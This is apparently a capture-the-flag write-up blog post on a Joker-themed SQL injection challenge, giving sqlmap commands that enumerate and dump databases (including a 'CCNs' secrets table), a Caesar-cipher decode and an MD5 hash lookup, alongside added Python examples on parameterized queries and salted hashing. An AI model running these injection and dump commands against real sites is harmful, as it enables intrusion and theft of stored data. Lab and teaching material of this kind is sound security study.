
Yes, that is grammatically correct. Now who doesn’t love a good book and an even better villain?

https://ctf.rc3.club:2010/

With Love,

Joker xx

If you go to the site, you will see there are two places to make queries.


We are going to check for some SQL Injection possibilities. First, let’s try putting something into each box.



You can see the parameters being used.

I’m going to be lazy and use SQLMap. If you’re trying to learn more about SQL Injection and how SQL works, it’s best to do this manually. But I used SQLMap because I was trying to get through as many challenges as possible.

Let’s use SQLMap to see if they are vulnerable to SQL Injection.

sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=1"


sqlmap -u "https://ctf.rc3.club:2010/connect2.php?secondary=1"


They are both vulnerable to SQL Injection.
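To show what sqlmap is actually detecting on those two parameters, here is an added example (not code from the original post or the challenge): a constructed SQLite table stands in for the backend, one lookup concatenates the parameter into the query the way a vulnerable connect.php would, the other binds it as a parameter, and a small check mirrors sqlmap's boolean-based test by comparing the results of a true and a false condition. The table name, rows and the `lookup_*` function names are all assumptions made for the example.

```python
import sqlite3


def build_db():
    # Constructed in-memory database standing in for the challenge backend;
    # the table and rows are made up for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (id INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO books VALUES (?, ?)",
        [(1, "The Killing Joke"), (2, "Year One"), (3, "Hush")],
    )
    return conn


def lookup_vulnerable(conn, primary):
    # The pattern sqlmap exploited: user input is spliced into the SQL text,
    # so a quote in the value ends the literal and the rest is parsed as SQL.
    sql = "SELECT title FROM books WHERE id = '" + primary + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, primary):
    # The fix: the value is bound to a placeholder and never parsed as SQL.
    sql = "SELECT title FROM books WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (primary,))]


def reacts_to_sql(lookup, conn, base="1"):
    # The idea behind sqlmap's boolean-based check, usable as a regression test
    # for your own query code: append a true and a false condition to the same
    # value. Safe handling gives identical results; parsing the input as SQL
    # makes the two results differ.
    true_case = lookup(conn, base + "' AND '1'='1")
    false_case = lookup(conn, base + "' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal input:", lookup_vulnerable(db, "1"))
    print("vulnerable, injected:   ", lookup_vulnerable(db, "1' OR '1'='1"))
    print("parameterized, injected:", lookup_parameterized(db, "1' OR '1'='1"))
    print("vulnerable reacts to SQL:", reacts_to_sql(lookup_vulnerable, db))
    print("parameterized reacts:    ", reacts_to_sql(lookup_parameterized, db))
```

The `reacts_to_sql` check is the kind of thing to keep in a test suite: it should return False for every query function in the code base, and it turns True the moment someone reintroduces string concatenation.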

Let’s discover databases:

sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=1" --dbs


sqlmap -u "https://ctf.rc3.club:2010/connect2.php?secondary=1" --dbs


sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=1" --tables -D flag

We then see a table, welcome.

sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=1" --dump -D flag -T welcome


Pcbfcppgle – this turns out not to be the flag. Since the challenge said the flag wouldn’t be in plaintext, I tried to decipher it, and it looks like a simple Caesar cipher.


Redherring still wasn’t the answer though.
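Since the post only names the cipher, here is an added example (not from the original post) of how the decoding is actually done: a Caesar cipher has only 25 useful shifts, so the practical approach is to try all of them and pick the output that contains a word you expect. Shifting each letter of pcbfcppgle forward by two gives redherring, which is the value the post arrived at. The `caesar_shift`, `brute_force` and `find_shift` names and the crib word list are assumptions made for this example.

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def caesar_shift(text, k):
    """Shift every letter of text forward by k positions (mod 26).
    Non-letters pass through unchanged; case is preserved."""
    out = []
    for ch in text:
        if ch.isalpha():
            alphabet = LOWER if ch.islower() else UPPER
            out.append(alphabet[(alphabet.index(ch) + k) % 26])
        else:
            out.append(ch)
    return "".join(out)


def brute_force(ciphertext):
    """Return {shift: candidate plaintext} for all 26 shifts.
    The key space is so small that enumerating it is the normal attack."""
    return {k: caesar_shift(ciphertext, k) for k in range(26)}


def find_shift(ciphertext, known_words):
    """Pick the first shift whose output contains a word we expect to see
    (a tiny crib-based scorer). Returns (shift, plaintext) or None."""
    for k, candidate in brute_force(ciphertext).items():
        if any(word in candidate for word in known_words):
            return k, candidate
    return None


if __name__ == "__main__":
    # Constructed crib list; "red" is enough to single out the right shift here.
    for k, text in brute_force("pcbfcppgle").items():
        print(f"shift {k:2d}: {text}")
    print(find_shift("pcbfcppgle", {"red", "flag", "joker"}))
```

Note that `caesar_shift(plaintext, 24)` reproduces the ciphertext: the challenge encrypted with a shift of 24, which is why decrypting is a shift of 2.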

Well, it seems we were bamboozled. Let’s keep looking. To save you the time of me going through each database, I’ll say that it was the CCNs database.

sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=1" --tables -D CCNs

This gets you a table, secrets.

sqlmap -u "https://ctf.rc3.club:2010/connect.php?primary=1" --dump -D CCNs -T secrets


Then we’ll take the Joker’s hash and put it through findmyhash.

findmyhash MD5 -h "c417fccfc5d5a288243c96359c62c381"


And there we go.
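The reason findmyhash works at all is that the table stored a bare, unsalted MD5: a fast hash with no salt is one dictionary or rainbow-table lookup away from the original string. As an added example (not from the original post, and using the well-known MD5 of "password" rather than the challenge's hash, whose plaintext the post does not state), the block below shows the lookup in miniature and, beside it, how the column should have been stored so that such a lookup is useless: a per-record random salt and a slow KDF (PBKDF2-HMAC-SHA256 here). The `md5_lookup`, `pbkdf2_store` and `pbkdf2_verify` names and the storage format are assumptions made for this example.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a hash pulled from a dumped "secrets" table:
# this is MD5("password"), a widely published value.
DUMPED_MD5 = "5f4dcc3b5aa765d61d8327deb882cf99"


def md5_lookup(target_hex, candidates):
    """Return the candidate whose unsalted MD5 equals target_hex, or None.
    Online lookup services do exactly this, with precomputed tables of
    billions of entries, which is why unsalted fast hashes offer no protection."""
    target = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def pbkdf2_store(password, iterations=200_000):
    """Produce the value that should have been stored instead of a bare MD5:
    a fresh random salt per record plus a deliberately slow KDF, so the same
    password yields a different stored value every time and no table applies."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute the KDF with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed candidate list for the lookup.
    print("md5 lookup:", md5_lookup(DUMPED_MD5, ["joker", "batman", "password"]))
    stored = pbkdf2_store("password")
    print("stored:", stored)
    print("verify correct:", pbkdf2_verify("password", stored))
    print("verify wrong:  ", pbkdf2_verify("joker", stored))
```

Two stored values for the same password will differ because of the random salt, so the dump-and-look-up step that ended this challenge has nothing to look up.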

Ashton-Drake, aka GameOfPWNZ, is an information security professional and enthusiast. He is the owner of this blog.
